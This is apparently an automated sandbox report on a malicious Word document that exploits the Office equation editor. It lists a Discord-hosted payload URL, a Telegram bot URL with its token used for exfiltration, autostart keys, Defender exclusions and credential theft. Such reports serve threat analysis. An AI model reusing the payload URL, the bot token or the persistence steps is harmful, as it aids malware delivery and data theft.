                      Domain AccountsCommand and Scripting Interpreter1Logon Script (Windows)Process Injection111Timestomp1Security Account ManagerSecurity Software Discovery211SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationEncrypted Channel12Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Registry Run Keys / Startup Folder321Masquerading221NTDSProcess Discovery1Distributed Component Object ModelInput Capture11Scheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptVirtualization/Sandbox Evasion231LSA SecretsVirtualization/Sandbox Evasion231SSHClipboard Data1Data Transfer Size LimitsApplication Layer Protocol3Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonAccess Token Manipulation1Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection111DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobHidden Files and Directories1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 425828 Sample: Order Confirmation.doc Startdate: 27/05/2021 Architecture: WINDOWS Score: 100 55 api.telegram.org 2->55 63 Found malware configuration 2->63 65 Sigma detected: Powershell adding suspicious path to exclusion list 2->65 67 Multi AV Scanner detection for submitted file 2->67 69 15 other signatures 2->69 9 EQNEDT32.EXE 1 2->9         started        14 svchost.exe 2->14         started        16 69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe 2->16         started        18 WINWORD.EXE 291 25 2->18         started        signatures3 process4 dnsIp5 59 cdn.discordapp.com 162.159.130.233, 443, 49165, 49166 CLOUDFLARENETUS United States 9->59 51 C:\Users\user\AppData\Roaming\srt.exe, PE32 9->51 dropped 81 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 9->81 20 srt.exe 5 4 9->20         started        83 Machine Learning detection for dropped file 14->83 85 Tries to delay execution (extensive OutputDebugStringW loop) 14->85 87 Injects a PE file into a foreign processes 14->87 89 Adds a directory exclusion to Windows Defender 16->89 24 powershell.exe 16->24         started        file6 signatures7 process8 file9 47 C:\Windows\Resources\Themes\...\svchost.exe, PE32 20->47 dropped 49 69vdz0d62eh81022f8...A2mdw7IdFa8a78d.exe, PE32 20->49 dropped 71 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 20->71 73 Machine Learning detection for dropped file 20->73 75 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 20->75 77 7 other signatures 20->77 26 srt.exe 20->26         started        31 69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe 1 20->31         started        33 powershell.exe 7 20->33         started        35 6 other processes 20->35 signatures10 process11 dnsIp12 61 api.telegram.org 149.154.167.220, 443, 49167, 49168 TELEGRAMRU United Kingdom 26->61 53 C:\Users\user\AppData\Local\...\qweruiuyt.exe, PE32 26->53 dropped 91 Tries to steal Mail credentials (via file access) 26->91 93 Creates multiple autostart registry keys 26->93 95 Tries to harvest and steal ftp login credentials 26->95 101 3 other signatures 26->101 97 Adds a directory exclusion to Windows Defender 31->97 99 Injects a PE file into a foreign processes 31->99 37 69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe 31->37         started        41 powershell.exe 31->41         started        43 powershell.exe 31->43         started        45 2 other processes 31->45 file13 signatures14 process15 dnsIp16 57 api.telegram.org 37->57 79 Hides that the sample has been downloaded from the Internet (zone.identifier) 37->79 signatures17

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Order Confirmation.doc25%VirustotalBrowse
                      Order Confirmation.doc34%ReversingLabsDocument-RTF.Exploit.Heuristic

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\srt.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\qweruiuyt\qweruiuyt.exe100%Joe Sandbox ML
                      C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe100%Joe Sandbox ML

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      cdn.discordapp.com
                      		162.159.130.233
                      		truefalse
                        		high
                        api.telegram.org
                        		149.154.167.220
                        		truefalse
                          		high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://cdn.discordapp.com/attachments/843685789120331799/847476783744811018/OtI.exefalse
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checksrt.exe, 00000003.00000002.2243682262.00000000081B7000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2107607698.0000000002E07000.00000002.00000001.sdmpfalse
                              		high
                              http://www.windows.com/pctv.powershell.exe, 00000004.00000002.2103261007.0000000002C20000.00000002.00000001.sdmpfalse
                                		high
                                http://investor.msn.comsrt.exe, 00000003.00000002.2243284497.0000000007FD0000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2103261007.0000000002C20000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.msnbc.com/news/ticker.txtsrt.exe, 00000003.00000002.2243284497.0000000007FD0000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2103261007.0000000002C20000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.icra.org/vocabulary/.srt.exe, 00000003.00000002.2243682262.00000000081B7000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2107607698.0000000002E07000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.srt.exe, 00000003.00000002.2223391097.00000000077F0000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2099924989.0000000002440000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000004.00000003.2094056276.0000000000629000.00000004.00000001.sdmp, powershell.exe, 00000006.00000003.2097646748.000000000037C000.00000004.00000001.sdmpfalse
                                        		high
                                        https://api.telegram.org/bot1870790471:AAFpD5zuAlCeqAqJnBFTcvC5WkaPoWtoQ9c/srt.exe, 00000003.00000002.2186618361.0000000004183000.00000004.00000001.sdmpfalse
                                          		high
                                          http://investor.msn.com/srt.exe, 00000003.00000002.2243284497.0000000007FD0000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2103261007.0000000002C20000.00000002.00000001.sdmpfalse
                                            		high
                                            http://www.piriform.com/ccleanerpowershell.exe, 00000004.00000003.2094056276.0000000000629000.00000004.00000001.sdmp, powershell.exe, 00000006.00000003.2097646748.000000000037C000.00000004.00000001.sdmpfalse
                                              		high
                                              http://www.%s.comPAsrt.exe, 00000003.00000002.2223391097.00000000077F0000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2099924989.0000000002440000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		low
                                              http://windowsmedia.com/redir/services.asp?WMPFriendly=truesrt.exe, 00000003.00000002.2243682262.00000000081B7000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2107607698.0000000002E07000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.hotmail.com/oesrt.exe, 00000003.00000002.2243284497.0000000007FD0000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2103261007.0000000002C20000.00000002.00000001.sdmpfalse
                                                		high
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namesrt.exe, 00000003.00000002.2222985178.00000000067F1000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipsrt.exe, 00000003.00000002.2186618361.0000000004183000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown

                                                  Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  149.154.167.220
                                                  		api.telegram.orgUnited Kingdom
                                                  		62041TELEGRAMRUfalse
                                                  162.159.130.233
                                                  		cdn.discordapp.comUnited States
                                                  		13335CLOUDFLARENETUSfalse

                                                  General Information

                                                  Joe Sandbox Version:32.0.0 Black Diamond
                                                  Analysis ID:425828
                                                  Start date:27.05.2021
                                                  Start time:21:32:23
                                                  Joe Sandbox Product:CloudBasic
                                                  Overall analysis duration:0h 18m 7s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Sample file name:Order Confirmation.doc
                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                  Number of analysed new started processes analysed:40
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • HDC enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Detection:MAL
                                                  Classification:mal100.troj.adwa.spyw.expl.evad.winDOC@48/23@30/2
                                                  EGA Information:Failed
                                                  HDC Information:Failed
                                                  HCA Information:
                                                  • Successful, ratio: 98%
                                                  • Number of executed functions: 778
                                                  • Number of non-executed functions: 0
                                                  Cookbook Comments:
                                                  • Adjust boot time
                                                  • Enable AMSI
                                                  • Found application associated with file extension: .doc
                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                  • Attach to Office via COM
                                                  • Scroll down
                                                  • Close Viewer
                                                  Warnings:
                                                  Show All
                                                  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                                  • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  21:32:35API Interceptor24x Sleep call for process: EQNEDT32.EXE modified
                                                  21:32:38API Interceptor1003x Sleep call for process: srt.exe modified
                                                  21:32:44API Interceptor250x Sleep call for process: powershell.exe modified
                                                  21:32:48AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe
                                                  21:32:53API Interceptor1020x Sleep call for process: 69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe modified
                                                  21:33:02AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce 69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe
                                                  21:33:10AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce 69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe
                                                  21:33:12API Interceptor146x Sleep call for process: svchost.exe modified
                                                  21:33:28AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run qweruiuyt C:\Users\user\AppData\Local\Temp\qweruiuyt\qweruiuyt.exe
                                                  21:33:37AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run qweruiuyt C:\Users\user\AppData\Local\Temp\qweruiuyt\qweruiuyt.exe

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  149.154.167.220Y9DdOa5xDz.exeGet hashmaliciousBrowse
                                                    file.exeGet hashmaliciousBrowse
                                                      file.exeGet hashmaliciousBrowse
                                                        AUF190604914 1003760.exeGet hashmaliciousBrowse
                                                          PI_455426_JK001_185856.1_202105241002208969,Pdf.exeGet hashmaliciousBrowse
                                                            revisedorder PO 2100002R.exeGet hashmaliciousBrowse
                                                              MT103-HSBC-SWIFT.exeGet hashmaliciousBrowse
                                                                Swift_HSBC_009908764585999583999022245790.PDF.exeGet hashmaliciousBrowse
                                                                  NEW PO POC2000010420-21.exeGet hashmaliciousBrowse
                                                                    revisedorder PO 2100002R.exeGet hashmaliciousBrowse
                                                                      SwiftPaymentRef07656.pdf.exeGet hashmaliciousBrowse
                                                                        Cefla_350608317BD.exeGet hashmaliciousBrowse
                                                                          Q3d6q3tktW.exeGet hashmaliciousBrowse
                                                                            95bc4f53_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                              1QPXpJcYVE.exeGet hashmaliciousBrowse
                                                                                TT Scancopy876594987658000.exeGet hashmaliciousBrowse
                                                                                  from-iso_SWIFTPAYMENTREF07656.PDF.EXEGet hashmaliciousBrowse
                                                                                    Doc_Quote 20.5.2021.exeGet hashmaliciousBrowse
                                                                                      V5wPFFql4U.exeGet hashmaliciousBrowse
                                                                                        system.exeGet hashmaliciousBrowse
                                                                                          162.159.130.233cfe14e87_by_Libranalysis.rtfGet hashmaliciousBrowse
                                                                                          • cdn.discordapp.com/attachments/520353354304585730/839557970173100102/ew.exe
                                                                                          SkKcQaHEB8.exeGet hashmaliciousBrowse
                                                                                          • cdn.discordapp.com/attachments/808882061918076978/836771636082376724/VMtEguRH.exe
                                                                                          P20200107.DOCGet hashmaliciousBrowse
                                                                                          • cdn.discordapp.com/attachments/808882061918076978/836771636082376724/VMtEguRH.exe
                                                                                          FBRO ORDER SHEET - YATSAL SUMMER 2021.exeGet hashmaliciousBrowse
                                                                                          • cdn.discordapp.com/attachments/832005460982235229/836405556838924308/usd.exe
                                                                                          SKM_C258 Up21042213080.exeGet hashmaliciousBrowse
                                                                                          • cdn.discordapp.com/attachments/832005460982235229/834717762281930792/12345.exe
                                                                                          SKM_C258 Up21042213080.exeGet hashmaliciousBrowse
                                                                                          • cdn.discordapp.com/attachments/832005460982235229/834717762281930792/12345.exe
                                                                                          G019 & G022 SPEC SHEET.exeGet hashmaliciousBrowse
                                                                                          • cdn.discordapp.com/attachments/832005460982235229/834598381472448573/23456.exe
                                                                                          Marking Machine 30W Specification.exeGet hashmaliciousBrowse
                                                                                          • cdn.discordapp.com/attachments/832005460982235229/834598381472448573/23456.exe
                                                                                          2021 RFQ Products Required.docGet hashmaliciousBrowse
                                                                                          • cdn.discordapp.com/attachments/821511904769998921/821511945881911306/panam.exe
                                                                                          Company Reference1.docGet hashmaliciousBrowse
                                                                                          • cdn.discordapp.com/attachments/819949436054536222/820935251337281546/nbalax.exe
                                                                                          PAY SLIP.docGet hashmaliciousBrowse
                                                                                          • cdn.discordapp.com/attachments/788946375533789214/788947376849027092/atlasx.scr
                                                                                          SecuriteInfo.com.Exploit.Rtf.Obfuscated.16.25071.rtfGet hashmaliciousBrowse
                                                                                          • cdn.discordapp.com/attachments/785423761461477416/785424240047947786/angelrawfile.exe
                                                                                          part1.rtfGet hashmaliciousBrowse
                                                                                          • cdn.discordapp.com/attachments/783666652440428545/783667553490698250/kdot.exe

                                                                                          Domains

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                          cdn.discordapp.comINVOICE.exeGet hashmaliciousBrowse
                                                                                          • 162.159.135.233
                                                                                          INVOICE.exeGet hashmaliciousBrowse
                                                                                          • 162.159.134.233
                                                                                          T2qL1jOO04.exeGet hashmaliciousBrowse
                                                                                          • 162.159.129.233
                                                                                          Payment Advice Reference No SWT005262021.exeGet hashmaliciousBrowse
                                                                                          • 162.159.133.233
                                                                                          QUjeZ56Irv.exeGet hashmaliciousBrowse
                                                                                          • 162.159.129.233
                                                                                          Ordine no. 20210527.docGet hashmaliciousBrowse
                                                                                          • 162.159.129.233
                                                                                          aydrxnitvo.exeGet hashmaliciousBrowse
                                                                                          • 162.159.130.233
                                                                                          PURCHASE ORDER LIST.exeGet hashmaliciousBrowse
                                                                                          • 162.159.130.233
                                                                                          Purchase Orders - Foreign_000000000088707.exeGet hashmaliciousBrowse
                                                                                          • 162.159.135.233
                                                                                          CamScanner 26.05.2021 3.05.exeGet hashmaliciousBrowse
                                                                                          • 162.159.133.233
                                                                                          DHL_887343.exeGet hashmaliciousBrowse
                                                                                          • 162.159.130.233
                                                                                          INV.exeGet hashmaliciousBrowse
                                                                                          • 162.159.130.233
                                                                                          IMG_0127_06_922.exeGet hashmaliciousBrowse
                                                                                          • 162.159.133.233
                                                                                          T89947386-Confirm-20210525-190086-Email-8799677.exeGet hashmaliciousBrowse
                                                                                          • 162.159.130.233
                                                                                          PL_0077_065_3.exeGet hashmaliciousBrowse
                                                                                          • 162.159.129.233
                                                                                          DLP_10578562.exeGet hashmaliciousBrowse
                                                                                          • 162.159.129.233
                                                                                          Product Details.exeGet hashmaliciousBrowse
                                                                                          • 162.159.130.233
                                                                                          Statement SKBMT 091818.exeGet hashmaliciousBrowse
                                                                                          • 162.159.129.233
                                                                                          products order pdf .exeGet hashmaliciousBrowse
                                                                                          • 162.159.133.233
                                                                                          ConsoleApp8.exeGet hashmaliciousBrowse
                                                                                          • 162.159.129.233
                                                                                          api.telegram.orgY9DdOa5xDz.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          file.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          file.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          AUF190604914 1003760.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          PI_455426_JK001_185856.1_202105241002208969,Pdf.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          revisedorder PO 2100002R.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          MT103-HSBC-SWIFT.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          Swift_HSBC_009908764585999583999022245790.PDF.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          NEW PO POC2000010420-21.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          revisedorder PO 2100002R.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          SwiftPaymentRef07656.pdf.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          Cefla_350608317BD.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          Q3d6q3tktW.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          95bc4f53_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          PO.CF004303.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          1QPXpJcYVE.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          TT Scancopy876594987658000.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          from-iso_SWIFTPAYMENTREF07656.PDF.EXEGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          Doc_Quote 20.5.2021.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          V5wPFFql4U.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220

                                                                                          ASN

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                          TELEGRAMRUY9DdOa5xDz.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          file.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          Qgc2Nreer3.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.99
                                                                                          file.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          AUF190604914 1003760.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          PI_455426_JK001_185856.1_202105241002208969,Pdf.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          revisedorder PO 2100002R.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          MT103-HSBC-SWIFT.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          Swift_HSBC_009908764585999583999022245790.PDF.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          NEW PO POC2000010420-21.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          revisedorder PO 2100002R.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          SwiftPaymentRef07656.pdf.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          Cefla_350608317BD.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          Q3d6q3tktW.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          95bc4f53_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          q3nnOgv0Q8.exeGet hashmaliciousBrowse
                                                                                          • 149.154.164.13
                                                                                          1QPXpJcYVE.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          TT Scancopy876594987658000.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          from-iso_SWIFTPAYMENTREF07656.PDF.EXEGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          Doc_Quote 20.5.2021.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          CLOUDFLARENETUS#U266c Voice_Audio_845021.htmGet hashmaliciousBrowse
                                                                                          • 104.18.10.207
                                                                                          E0O4iRjJyy.exeGet hashmaliciousBrowse
                                                                                          • 172.67.188.154
                                                                                          INVOICE.exeGet hashmaliciousBrowse
                                                                                          • 162.159.135.233
                                                                                          INVOICE.exeGet hashmaliciousBrowse
                                                                                          • 162.159.134.233
                                                                                          8pMF3KenX9.exeGet hashmaliciousBrowse
                                                                                          • 172.67.145.48
                                                                                          T2qL1jOO04.exeGet hashmaliciousBrowse
                                                                                          • 172.67.186.79
                                                                                          f2fR2CiaRu.exeGet hashmaliciousBrowse
                                                                                          • 104.21.62.88
                                                                                          8nAxSn6IsV.exeGet hashmaliciousBrowse
                                                                                          • 1.1.1.1
                                                                                          VM.HTMLGet hashmaliciousBrowse
                                                                                          • 104.18.10.207
                                                                                          3107790.dat.dllGet hashmaliciousBrowse
                                                                                          • 104.20.185.68
                                                                                          #U266c Voice_Audio_845021.htmGet hashmaliciousBrowse
                                                                                          • 104.18.11.207
                                                                                          Wynnlasvegas_Scan_item.htmGet hashmaliciousBrowse
                                                                                          • 104.16.19.94
                                                                                          72c8db337dc04e4bdb1c840e81a4ecee5b1bacd328bbb.dllGet hashmaliciousBrowse
                                                                                          • 172.67.142.43
                                                                                          71bc262977cf6112541d871c3946ab6112d64297ef5f8.dllGet hashmaliciousBrowse
                                                                                          • 104.21.87.66
                                                                                          Payment Advice Reference No SWT005262021.exeGet hashmaliciousBrowse
                                                                                          • 162.159.133.233
                                                                                          39dde7049b772424639030d139edf59fb1f227604c6a3.dllGet hashmaliciousBrowse
                                                                                          • 172.67.142.43
                                                                                          75b228968195fe08af23cefc88ec6d35a33347c4774ac.dllGet hashmaliciousBrowse
                                                                                          • 172.67.142.43
                                                                                          Sait_Message.htmGet hashmaliciousBrowse
                                                                                          • 104.16.18.94
                                                                                          USU(1).exeGet hashmaliciousBrowse
                                                                                          • 172.65.227.72
                                                                                          Document_46161561.xlsGet hashmaliciousBrowse
                                                                                          • 172.67.73.224

                                                                                          JA3 Fingerprints

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                          05af1f5ca1b87cc9cc9b25185115607dRgWKJzipph.docGet hashmaliciousBrowse
                                                                                          • 162.159.130.233
                                                                                          purchase inquiry 25.5.2021.doc__.rtfGet hashmaliciousBrowse
                                                                                          • 162.159.130.233
                                                                                          42bceb60_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                                          • 162.159.130.233
                                                                                          a9afdac1_by_Libranalysis.docxGet hashmaliciousBrowse
                                                                                          • 162.159.130.233
                                                                                          2421c4d0_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                                          • 162.159.130.233
                                                                                          b4b13a17_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                                          • 162.159.130.233
                                                                                          purchase order.docGet hashmaliciousBrowse
                                                                                          • 162.159.130.233
                                                                                          Unconfirmed 630743.docxGet hashmaliciousBrowse
                                                                                          • 162.159.130.233
                                                                                          SWIFT_Scanned_Copy.docxGet hashmaliciousBrowse
                                                                                          • 162.159.130.233
                                                                                          remittance details.docxGet hashmaliciousBrowse
                                                                                          • 162.159.130.233
                                                                                          130985cf_by_Libranalysis.rtfGet hashmaliciousBrowse
                                                                                          • 162.159.130.233
                                                                                          Payoff - 2021AT0514.docGet hashmaliciousBrowse
                                                                                          • 162.159.130.233
                                                                                          Payment Slip.docxGet hashmaliciousBrowse
                                                                                          • 162.159.130.233
                                                                                          4b092c1e_by_Libranalysis.docxGet hashmaliciousBrowse
                                                                                          • 162.159.130.233
                                                                                          eb57884e_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                                          • 162.159.130.233
                                                                                          79cc8c05_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                                          • 162.159.130.233
                                                                                          Tender Overview 10052021.docGet hashmaliciousBrowse
                                                                                          • 162.159.130.233
                                                                                          bb37e159_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                          • 162.159.130.233
                                                                                          471e3984_by_Libranalysis.docxGet hashmaliciousBrowse
                                                                                          • 162.159.130.233
                                                                                          calvary petroleum.docGet hashmaliciousBrowse
                                                                                          • 162.159.130.233
                                                                                          36f7277af969a6947a61ae0b815907a18b664227_by_Libranalysis.pptGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          KUP ZAM#U00d3WIENIE-34002174.pptGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          280fdaa5_by_Libranalysis.pptGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          PO-AWB.xlsxGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          remittance details.docxGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          presupuesto.xlsxGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          presupuesto.xlsxGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          2021-Quotation.xlsxGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
